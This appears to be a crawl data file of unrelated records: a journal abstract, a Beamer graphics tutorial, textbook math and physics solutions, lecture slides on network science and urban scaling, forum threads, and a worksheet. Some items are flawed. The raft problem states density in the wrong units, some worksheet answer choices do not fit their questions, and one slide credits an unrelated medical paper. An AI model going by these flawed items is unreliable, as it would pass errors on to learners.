{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3908851146697998, "perplexity": 9708.391493265697}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202510.47/warc/CC-MAIN-20190321092320-20190321114320-00338.warc.gz"}
https://www.projecteuclid.org/euclid.bj/1066418879
## Bernoulli • Bernoulli • Volume 9, Number 5 (2003), 809-831. ### Empirical processes of long-memory sequences Wei Biao Wu #### Abstract Asymptotic expansions of long-memory sequences indexed by piecewise differentiable functionals are investigated, and upper bounds of outer expectations of these functionals are given. These results differ strikingly from the classical theories of empirical processes of independent random variables. Our results go beyond earlier ones by allowing wider classes of function as well as by presenting sharper bounds, and thus provide a more versatile approach for related statistical inferences. A complete characterization of empirical processes for the class of indicator functions is presented, and an application to $M$-estimation is discussed. #### Article information Source Bernoulli, Volume 9, Number 5 (2003), 809-831. Dates First available in Project Euclid: 17 October 2003 https://projecteuclid.org/euclid.bj/1066418879 Digital Object Identifier doi:10.3150/bj/1066418879 Mathematical Reviews number (MathSciNet) MR2047687 Zentralblatt MATH identifier 1188.62288 #### Citation Biao Wu, Wei. Empirical processes of long-memory sequences. Bernoulli 9 (2003), no. 5, 809--831. doi:10.3150/bj/1066418879. https://projecteuclid.org/euclid.bj/1066418879
2019-10-23 11:44:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31408262252807617, "perplexity": 2915.715561621182}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987833089.90/warc/CC-MAIN-20191023094558-20191023122058-00462.warc.gz"}
https://userpages.umbc.edu/~rostamia/beamer/quickstart-Z-H-13.html
# 13  Including graphics Beamer recognizes images in any of the pdf, png and jpg formats. (Note that PostScript is not among these.) In the following sample we include three pictures side-by-side in a slide. % graphics.tex \documentclass{beamer} \usetheme{Copenhagen} \begin{document} \begin{frame}{Graphics} Here we include three images, one each of PDF, PNG, and JPG types. \begin{center} \includegraphics[width=0.3\textwidth]{image1.pdf} \includegraphics[width=0.3\textwidth]{image2.png} \includegraphics[width=0.3\textwidth]{image3.jpg} \end{center} \end{frame} \end{document} Here is the result: ## Converting graphics When you create an image with the intention of including it in a Beamer document, it is best if you save it in one of the pdf, png or jpg formats that are recognizable by Beamer.4 This is sometimes not possible. For instance, you may have downloaded the image from somewhere and it is in the gif format. The department’s computer facilities provide a large number of utilities for converting and modifying graphical images. ### eps to pdf To convert an Encapsulated PostScript image to pdf, do: epstopdf filename.eps This will produce a file named filename.pdf.5 ### All other conversions The general-purpose convert6 command converts from any graphics format to any other graphics format. For instance, to convert a gif file to the png format, do: convert filename.gif filename.png Similarly, to convert a tiff file to jpg, do: convert filename.tiff filename.jpg In fact, we can have convert take over the job of epstopdf as well, as in: convert filename.eps filename.pdf however in my experience epstopdf produces better results. 4 The png format works best for line drawings, such as graphs of functions in 2D. The jpg format works best with gradually varying shades, such as the photograph of a person’s face. 5 The epstopdf utility is a perl script that calls ghostscript to do the actual conversion. In many Linux distributions it is bundled with the main TeX/LaTeX package. 6 The convert utility is a part of ImageMagick suite of graphics manipulation utilities.
2018-12-11 07:26:18
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5680212378501892, "perplexity": 5130.838348139799}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376823588.0/warc/CC-MAIN-20181211061718-20181211083218-00514.warc.gz"}
https://byjus.com/questions/a-raft-of-wood-density-600-g-m3-of-mass-120-kg-floats-in-water-how-much-weight-can-be-put-on-the-raft-to-make-it-just-sink/
# A Raft Of Wood (Density 600 G/M3) Of Mass 120 Kg Floats In Water. How Much Weight Can Be Put On The Raft To Make It Just Sink? Given: Density = $$600 g/m^{3}$$ Mass of a raft of wood = 120 kg The mass of water displaced = $$\frac{120}{600} * 1000$$ $$\Rightarrow$$ 0.2 * 1000 $$\Rightarrow$$ 200kg The mass of a raft of wood = 120 kg Therefore, the total weight reqiored to amke the raft sink is: $$\Rightarrow$$ 200 – 120 = 80 kg. Explore more such questions and answers at BYJU’S.
2021-09-22 19:58:44
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.347958505153656, "perplexity": 2830.76321450224}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057388.12/warc/CC-MAIN-20210922193630-20210922223630-00325.warc.gz"}
https://www.gradesaver.com/textbooks/math/algebra/elementary-and-intermediate-algebra-concepts-and-applications-6th-edition/chapter-2-equations-inequalities-and-problem-solving-2-3-formulas-2-3-exercise-set-page-101/49
## Elementary and Intermediate Algebra: Concepts & Applications (6th Edition) $l=4t+w-108$ Using the properties of equality, in terms of $l$, the given equation, $t=27-\dfrac{1}{4}(w-l)$, is equivalent to \begin{array}{l} 4(t)=4(27)-1(w-l) \\\\ 4t=108-w+l \\\\ 4t-108+w=l \\\\ l=4t+w-108 .\end{array}
2018-09-25 03:14:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9986098408699036, "perplexity": 10273.497065439637}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267160923.61/warc/CC-MAIN-20180925024239-20180925044639-00041.warc.gz"}
http://www.chegg.com/homework-help/questions-and-answers/can-somebody-please-post-a-solution-to-this-problem-q3195844
## WHY HAS NOBODY ANSWERED THIS YET?!?!?!?!?!? Can somebody please post a solution to this problem? • where is question my dear it is not uploaded Get homework help
2013-05-22 01:52:42
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9019439816474915, "perplexity": 3659.081632240743}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368701063060/warc/CC-MAIN-20130516104423-00053-ip-10-60-113-184.ec2.internal.warc.gz"}
https://etranos.info/urban_analytics_city_science/src/network_science.html
Network science, urban laws and scaling Emmanouil Tranos University of Bristol, Alan Turing Institute e.tranos@bristol.ac.uk, @EmmanouilTranos, etranos.info Network Science: The Evolution of a ‘New’ Science • Not really new • Graph Theory in the 18th century • Leonhard Euler’s work on small graphs • High degree of regularity: similar degree centrality among different nodes 1st milestone: Random networks (RN) • 20th Century: advances in mathematics and statistics • Algorithmic network analysis • Erdős, Rényi, et al. (1960) • Large scale networks with no obvious structure • Nodes degree follows a Poisson distribution: similar degree, close to the average degree , rare exceptions • Representative of real world network? 1st milestone: Random networks (RN) Source: Watts and Strogatz (1998) 1st milestone: Random networks (RN) Source: Torres et al. (2009) Networks become important… • … in different fields, from social science to biology • Digitization of data in many different fields + large databases ➔ real world systems as networks • Advances in computer science and in computing • Looseness between different disciplinary boundaries • Reductionist approaches lose ground in favor of holistic research approaches, which try to understand the system as a whole 2nd milestone: Small-worlds • Small world effect • Milgram’s six degrees of separation (1967) • Bacon number • Short average distances, enabling nodes to reach each other within a few steps • Characteristic of numerous real world networks • Structural characteristic rather than an organizing principle • Even RN networks are characterized by short average distances 2nd milestone: Small-worlds • Watts and Strogatz (1998) Small-world (SW) model • Coexistence of short average distance with high clustering coefficient • SW networks are located between regular and random networks: • Highly clustered like regular lattices • Small distances like random networks • Node degree distribution is quite similar with the RN and decays exponentially 2nd milestone: Small-worlds • A set of intensively interconnected local clusters, which gain global connectivity via a few links, which span the entire network linking distant clusters • Nodes in SW networks benefit from the high local connectivity and easy distant communication with remote clusters using the intra-cluster links • Probability of finding a highly connected node decreases exponentially as highly connected nodes are practically absent in RN and SW models 2nd milestone: Small-worlds Source: Watts and Strogatz (1998) 2nd milestone: Small-worlds Pros and cons • Social capital (bridging and bonding) • Real world examples? 3rd milestone: Scale-free (SF) networks • Barabási and Albert (1999) • Very few super connected nodes and a vast majority of less connected nodes • SF: nodes degree distribution follows a power law distribution regardless the scale of observation • 2 main formation mechanisms: • growth: expansion of networks over time • preferential attachment: growth is not equally dispersed across the nodes; highly connected nodes are more likely to receive new links than the lower degree nodes 3rd milestone: Scale-free (SF) networks • An initial difference in the connectivity between two nodes will increase further as the network grows • This is a cumulative — rich get richer — process • The probability $P(k)$ that a node has a degree $k$ decays following a power function, with usually $2 < \gamma < 3$ $P(k)≈𝑘^{−\gamma}$ • Power laws in networks are related with the existence of both of the above two mechanisms • Later versions of SF models included more realistic options for the network growth 3rd milestone: Scale-free (SF) networks Source: Albert, Jeong, and Barabási (2000) 3rd milestone: Scale-free (SF) networks And finally the power law… 3rd milestone: Scale-free (SF) networks Pros and cons? • Efficiency • Resilience • Vulnerability towards targeted attacks • Real world examples? Network Science: a summary • Both RN and SW have short average distances • RN cannot be included in SW because they lack the high clustering coefficient • SF networks share the short average distance and the high cluster coefficient of SW ones, but the SW are not characterized by the scale-free distribution • All scale free networks display small world properties, while all small-world networks are not necessarily scale free Network science: An epistemological discussion 1. Complexity Science • Most studies in the network science domain have a starting point in statistical physics • Stochastic approaches • Underlying probability model which usually follows a power law • Main objective: identification of the underlying mechanisms using generative modeling and simulation • Potential risk: the probability model might not follow a power law mechanism, which is a common assumption Network science: An epistemological discussion 2. Social Network Analysis • Sociology and graph theory • Focus on social networks • Extensive utilization of network metrics Network science: An epistemological discussion 3. Geography and Urban Analytics • Softer’ approaches • Ex-post empirical modeling for identifying characteristics of theoretical network models in real world networks • Global and local network statistics • Use of network measures in mainstream statistical modeling • Empirical verification of the functions that better explain the node degree distribution (power vs. exponential functions) • Spatial networks, but also dynamic networks Scaling What is scale and scaling • Scale in geography • Scale in math: • $y(x_i)$ a function of $x_i$ where $i$ is a spatial unit • If we scale $x$ by some scalar $\lambda$, the function scales if its scaled value is proportional to its previous value: $y(\lambda x_i) \propto y(x_i)$ • $y(x_i) = x_i^a$ • $y(\lambda x_i) = (\lambda x_i)^a = \lambda^a x_i^a = \lambda^a y(x_i)$ • ➔ Power law Laws of urban scaling • Regularities • Quantitative revolution post WW2 • Cultural turn • … today … Metcalfe’s law / Moore’s law • As cities grow… • … the number of potential connections increases as the square of population. • $C = p(p-1)/2 \propto p^2$ von Thunen’s law • As cities grow in size … • land values decline non-linearly from the centre Source: Coe, Kelly, and Yeung (2019) Law of gravitation / Tobler’s law • As cities grow… • .. interactions between them decline with increasing distance • Newton law of gravitation Source: I, Dennis Nilsson, CC BY 3.0, https://commons.wikimedia.org/w/index.php?curid=3455682 Zipf law • As cities get larger… • … there are less of them • Regularity in the distribution of cities within a country • Empirical observation and quantification • Hierarchical urban systems: • one/a few big cities • more medium size cities • large number of very small cities Zipf law Source: O’sullivan (2012) Rank size rule $pop_i = pop_d r_i^{-a}$ if $a=1$: Zipf law $pop_i = pop_d / r_i$ Zipf law Rank size rule $pop_i = pop_d r_i^{-a}$ if $a=1$: Zipf law $pop_i = pop_d / r_i$ Zipf law • Primary cities above what a Zipf law would predict • Newly industrialised countries • No overall consensus why the rank-size rule holds • Statistical regularity or an underpinning micro-economic process? Bettencourt-West or Marshall’s law • As cities grow… • … their average real income (and wealth) increases more than proportionately $Y_i = Y_0P_i^\beta$ • $Y_i$: material resources (energy or infrastructure) or social activity (wealth, patents, and pollution) in city $i$ • $Y_o$: normalization constant • $P_i$: population of city i • $\beta$: exponent Bettencourt-West or Marshall’s law Source: Bettencourt et al. (2007) • Not surprisingly another straight line • Another power law Bettencourt-West or Marshall’s law Source: Bettencourt et al. (2007) Bettencourt-West or Marshall’s law An average urban dweller in the capital, Lisbon, has approximately twice as many reciprocated mobile phone contacts, k, as an average individual in the rural town of Lixa. Source: Bettencourt (2021) Bettencourt-West or Marshall’s law • $Y=3P^b$ • 300 random observation • Plotting the results • Economies of scale • $b<1$ decreasing returns to scale • $b=1$ constant returns • $b>1$ increasing returns • SF networks, economies of scale? Revisit economies of scale Epilogue Bettencourt (2021): Cities, of course, do not really have their own dynamics; they depend on decisions made by people, corporations, governments, and others. The aggregate statistics of all their decisions will therefore emerge as key and provide another con- nection to the uses of information in urban science. References Albert, Réka, Hawoong Jeong, and Albert-László Barabási. 2000. “Error and Attack Tolerance of Complex Networks.” Nature 406 (6794): 378–82. Barabási, Albert-László, and Réka Albert. 1999. “Emergence of Scaling in Random Networks.” Science 286 (5439): 509–12. Batty, Michael. 2013. The New Science of Cities. MIT press. Bettencourt, Luı́s MA. 2021. “Introduction to Urban Science: Evidence and Theory of Cities as Complex Systems.” Bettencourt, Luı́s MA, José Lobo, Dirk Helbing, Christian Kühnert, and Geoffrey B West. 2007. “Growth, Innovation, Scaling, and the Pace of Life in Cities.” Proceedings of the National Academy of Sciences 104 (17): 7301–6. Coe, Neil M, Philip F Kelly, and Henry WC Yeung. 2019. Economic Geography: A Contemporary Introduction. John Wiley & Sons. Erdős, Paul, Alfréd Rényi, et al. 1960. “On the Evolution of Random Graphs.” Publ. Math. Inst. Hung. Acad. Sci 5 (1): 17–60. O’sullivan, Arthur. 2012. “Urban Economics 8th Ed.” Torres, Sonia H, Marı́a Montes de Oca, Eduardo Loeb, Priva Zabner-Oziel, Valentina Wallis, and Noelina Hernández. 2009. “Isoenzimas de Lactatodeshidrogenasa En El músculo Esquelético de Pacientes Con EPOC.” Archivos de Bronconeumologı́a 45 (2): 75–80. Watts, Duncan J, and Steven H Strogatz. 1998. “Collective Dynamics of ‘Small-World’networks.” Nature 393 (6684): 440–42.
2022-12-01 15:38:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6110867857933044, "perplexity": 14727.643370221896}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710829.5/warc/CC-MAIN-20221201153700-20221201183700-00723.warc.gz"}
https://www.gradesaver.com/textbooks/math/geometry/geometry-common-core-15th-edition/chapter-7-similarity-common-core-cumulative-standards-review-selected-response-page-486/15
## Geometry: Common Core (15th Edition) area of deck = $80$ $m^2$ If we want to find the area of the deck in the real world and not according to the scale drawing, let us convert the scale drawing to real world measurements first. We know that the scale is $1$ $in.$ = $2$ $m$, so let's set up the proportion to find what the dimensions are in real life. Let's convert the width of the pool first: $\frac{1}{2} = \frac{2}{x}$ Use the cross products property to eliminate the fractions: $x = 4$ Now, we convert the length of the pool: $\frac{1}{2} = \frac{6}{x}$ Use the cross products property to eliminate the fractions: $x = 12$ m Next, we convert the width of the deck and pool combined: $\frac{1}{2} = \frac{4}{x}$ Use the cross products property to eliminate the fractions: $x = 8$ m Finally, we convert the length of the deck and pool combined: $\frac{1}{2} = \frac{8}{x}$ Use the cross products property to eliminate the fractions: $x = 16$ m We want to find the area of just the deck, which we can do if we subtract the area of the pool from the area of both the pool and the deck together. Let's find the area of the pool by using the following formula for the area of a rectangle: $A = lw$, where $A$ is the area, $l$ is the length, and $w$ is the width of the rectangle. Let's substitute what we know into this formula to find the area of the pool itself: $A = (4 m)(12 m)$ Multiply to solve: $A = 48$ $m^2$ Now, let's find the area of the combined pool and deck: $A = (8 m)(16 m)$ Multiply to solve: $A = 128$ $m^2$ To find the area of the deck as depicted in the scale drawing, we subtract the area of the pool from the combined area of the pool and the deck together: area of deck = $128$ $m^2 - 48$ $m^2$ Subtract to solve: area of deck = $80$ $m^2$
2020-09-20 23:43:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7296427488327026, "perplexity": 225.35357454900844}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400198868.29/warc/CC-MAIN-20200920223634-20200921013634-00767.warc.gz"}
https://www.physicsforums.com/threads/thin-film-interference.955360/
# Thin film interference ## Homework Statement Between two pieces of glass (##n_1=1.70##), there is a thin film of water (##n_2=1.33## and width ##d=1 \mu m##). If there is normal-incidence of white light on the water surface, find: (a) which wavelenghts can be seen in the light transmitted (answer: 667 nm,533 nm,444 nm, 381 nm) (b) which wavelenghts can be seen in the light reflected (answer: 593 nm,484 nm, 410 nm, (355 nm) ) ## The Attempt at a Solution (a) I don't know how to deal with light transmitted (b) I set the ##2d= \left(m-\frac{1}{2} \right) \cdot \frac{\lambda}{n_2}## to find the lambdas for ##m=1,2...## but I obtain only ##\lambda_{m=1}=355 nm## (below the light that can be seen). Any help? TSny Homework Helper Gold Member (a) I don't know how to deal with light transmitted You can assume that none of the light is absorbed by the material. So, the total amount of incoming light energy must be conserved. As less light is reflected, more light must be transmitted. And vice versa. (b) I set the ##2d= \left(m-\frac{1}{2} \right) \cdot \frac{\lambda}{n_2}## to find the lambdas for ##m=1,2...## but I obtain only ##\lambda_{m=1}=355 nm## (below the light that can be seen). Your equation looks OK. But, in order to get a wavelength of 355 nm, I have to let m = 8. You will need to choose values of m that yield visible wavelengths. You can assume that none of the light is absorbed by the material. So, the total amount of incoming light energy must be conserved. As less light is reflected, more light must be transmitted. And vice versa. Thanks. But how can I set the equation for the constructive interference in the first case? There is no interference since the light is transmitted(?) TSny Homework Helper Gold Member Thanks. But how can I set the equation for the constructive interference in the first case? There is no interference since the light is transmitted(?) There is always interference (constructive, destructive, or something in between) in the transmitted waves and in the reflected waves. Standard textbooks show how you get two reflected rays that interfere. See if you can show how to get two transmitted waves that interfere. Hint: One of the transmitted rays has no reflections. The other transmitted wave has more than one reflection.
2022-05-28 17:56:40
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.873077392578125, "perplexity": 930.69995673548}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652663016949.77/warc/CC-MAIN-20220528154416-20220528184416-00404.warc.gz"}
https://www.edugain.com/sampleWorksheet/grade-9/Linear-Equations-in-Two-Variables/Online
### Choose correct answer(s) from given choice 1)Find the point where linear equation 4x + 4y = 32 intersects with x-axis. a. (8, 0) b. (0, 4) c. (0, 8) d. (4, 0) 2)At what point does the line represented by the equation 8x + 4y = 8 intersects a line which is parallel to the y-axis, and at a distance 3 units from the origin and in the negative direction of x-axis. a. (0, 4) b. (-3, 0) c. (0, 8) d. (-3, 8) 3)A telecom operator charges $1.1 for the first minute and$ 0.7 per minute for subsequent minutes of a call. If duration of call is represented as d, and amount charged is represented as c, find the linear equation for this relationship. a. c = 1.1d + 0.7 b. c = 0.7d + 1.1 c. c = 1.1d + 0.4 d. c = 0.7d + 0.4 4)In graph of linear equation 4x + 3y = 34, there is a point such that its ordinate is 5 less than its abscissa. Find coordinates of the point. a. (6, 1) b. (1, 6) c. (2, 7) d. (7, 2) 5)Find the linear equation represented in the graph below. a. q/p b. pq c. 1 d. p/q 6)Equation 6x + 3y = 6 has a. No solution b. Infinitely many solutions c. Two solutions d. A unique solution 7)If graph of the equation y = mx + c passes through the origin, what is the value of c. a. -1 b. 0 c. 2 d. 1 8)Find the linear equation represented in the graph below. a. y = - 2 b. y = -x + 2 c. y = 2 d. y = 0 9)A line passe through points (-3, -14) and (1, 2). Find the x-intercept of the line. a. -0.5 b. 0.5 c. 1 d. 0 10)If solutions of a linear equation are (-2, 2), (0, 0) and (2, –2), find the equation. a. -2x + y = 0 b. x - y = 0 c. x + y = 0 d. x -2y = 0
2017-09-19 13:34:48
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5468038320541382, "perplexity": 760.6358566553771}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-39/segments/1505818685698.18/warc/CC-MAIN-20170919131102-20170919151102-00427.warc.gz"}
https://webwork.maa.org/moodle/mod/forum/discuss.php?d=6366
## WeBWorK Problems ### Multiple Choice with Fill in the Blank by Brittni Lorton - Number of replies: 7 I tried to find something like this in the forum but I was coming up blank. Is is possible to have a question be multiple choice (i.e. Raidio or Checkbox ) and ALSO include fill in the blank. Something that would look like: Determine the solution to the given system of equations. • The system has one unique solution at ____(student would have to select this one AND fill in the blank of the solution point) • The system has no solutions • The system has infinitely many solutions. Any thoughts? Thank you, *Brittni In reply to Brittni Lorton ### Re: Multiple Choice with Fill in the Blank by Glenn Rice - Yes it is possible.  It is not easy though.  I have a macro that I use for this that makes it a little easier.  It works much like the multi answer macro, and you have to provide a checker routine.  It takes a little more work to set up the problem as well.  Due to the nature of the structure used the checker is a little more complex.  At some point I plan to add it to the PG macros. I have attached the macro and an example if you would like to try it out.  There is documentation in the file.  Feel free to ask if you need additional help. In reply to Glenn Rice ### Re: Multiple Choice with Fill in the Blank by Glenn Rice - Here is another example that uses the macro in a simpler way. The format and tex_format options are not required. I realized that both this example and the previously attached example use the default checker, and to not need to provide one. For some simpler problems this is possible. In reply to Glenn Rice ### Re: Multiple Choice with Fill in the Blank by Glenn Rice - Here is another example that does need a checker routine. In reply to Glenn Rice ### Re: Multiple Choice with Fill in the Blank by Brittni Lorton - This is very helpful! The examples are really helping me understand the concepts, so I appreciate it. I am wondering what would be best for me in terms of including the macro on my server. I do not have server access so I will reach out to our sys admin and see where he puts all the macros and if this one proves to be helpful then I'll have him add it where the other ones are - unless someone has a different suggestion? This will be the first time I've had to use an additional macro not already included so I am unfamiliar with best practices here. Thank you! In reply to Brittni Lorton ### Re: Multiple Choice with Fill in the Blank by Paul Seeburger - Hi, Brittni! You should be able to add new or adjusted macros to your macros folder in the templates folder for your course.  They will only affect problems in your course this way, but it will allow you to make use of them. Paul In reply to Paul Seeburger ### Re: Multiple Choice with Fill in the Blank by Brittni Lorton - Hi Paul! Yes I am doing that right now but I am thinking of best practices if we want to use this for all of our courses and colleges here, where is the best location for these additional macros? Maybe each school does it a little differently but I was just curious if there was a best practices in terms of where to put these on teh servers so that we dont have to upload them separately to each course. In reply to Brittni Lorton ### Re: Multiple Choice with Fill in the Blank by Alex Jordan - You have a lot of options for where you could put a common version of a macro file, assuming you have access to the server side of things. In localOverrides.conf, you have this line: https://github.com/openwebwork/webwork2/blob/cfb690ade3d3c55527d522ed1a8f1defd5e19f6a/conf/localOverrides.conf.dist#L267 You can add a path to the list of paths that are searched for macro library files. So (this is just one option) you could make a course that is for development purposes only, and put new macro library files there in its macros folder. Then add that folder to the list of paths with something like: $pg{directories}{macrosPath} = [@{$pg{directories}{macrosPath}},"/opt/webwork/courses/developmentCourse/templates/macros"]; Then all courses will be able to use 